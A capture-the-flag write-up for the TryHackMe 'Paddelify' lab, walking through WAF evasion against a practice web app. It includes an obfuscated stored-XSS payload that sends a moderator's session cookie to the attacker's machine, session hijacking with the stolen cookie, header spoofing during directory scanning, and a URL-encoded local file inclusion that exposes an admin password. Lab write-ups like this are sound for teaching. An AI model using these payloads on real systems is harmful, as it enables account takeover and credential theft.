Paddelify – TryHackMe challenge

by

Description

You’ve signed up for the Padel Championship, but your rival keeps climbing the leaderboard. The admin panel controls match approvals and registrations. Can you crack the admin and rewrite the draw before the whistle?
Note: In case you want to start over or restart all services, visit http://10.82.162.200/status.php

Directories enumeration

First I used common feroxbuster command to discover directories but It found only cgi-bin:

feroxbuster -u 'http://10.82.162.200' -w /media/sf_wordlists/SecLists-master/Discovery/Web-Content/big.txt

As the challenge is related to WAF rules bypassing techniques I used more fancy feroxbuster command with several additional options to simulate normal user activity:

feroxbuster -t 3 --random-agent -H "X-Forwarded-For: 127.0.0.1" -H "X-Real-IP: 127.0.0.1" -H "X-Originating-IP: 127.0.0.1" --timeout 5  -u 'http://10.82.162.200' -w /media/sf_wordlists/SecLists-master/Discovery/Web-Content/big.txt

feroxbuster found several interesting directories:

  • http://10.82.162.200/config/ -> there is directories listing
  • http://10.82.162.200/logs/error.log
  • http://10.82.162.200/index.php – registering user account panel

Under http://10.82.162.200/config/ we can see app.conf file, but we do not have access to this file as it triggers WAF:

Registering user account and stealing cookie

I registered a new account named player using the panel here: http://10.82.162.200/index.php . After registering I got information that the moderator will review my request.
 As the moderator is reviewing requests, there is a chance to steal the moderator’s cookie.
I started an HTTP server on my kali linux:

python3 -m http.server

I tried to put a malicious payload into the username field during registration of a user. When the moderator will review this request, the payload will trigger stealing the moderator’s cookie.
Unfortunately the moderator was not clicking on every link so I needed something triggered without any interaction.
I tried many techniques to obfuscate the payload but the working one was:

<<SCRIPT>var i=new Image(); i.src="http://MY_MACHINE_IP:8000/?c="+document['co'+'ok'+'ie'];</SCRIPT>

After a short while I got the moderator’s cookie:

I replaced PHPSESSID cookie  value in my browser storage to cookie value stolen from the moderator’s session and refreshed the page. I got access to the moderator dashboard and the first flag.

I changed my password using the form on the bottom of the dashboard just in case my session cookie would expire.

LFI – accessing config/app.conf

I clicked on “Live” link on the top of the page and noticed that the structure of the URL is like:
http://10.82.162.200/live.php?page=match.php  potentially we can access config/app.conf using this link.
Simply trying to access: http://10.82.162.200/live.php?page=config/app.conf resulted with triggering WAF and forbidden error.
URL encoding all characters helped to bypass WAF: 

http://10.82.162.200/live.php?page=%63%6f%6e%66%69%67%2f%61%70%70%2e%63%6f%6e%66 

admin_info value is the password to the admin panel. I logged in using username admin and this password.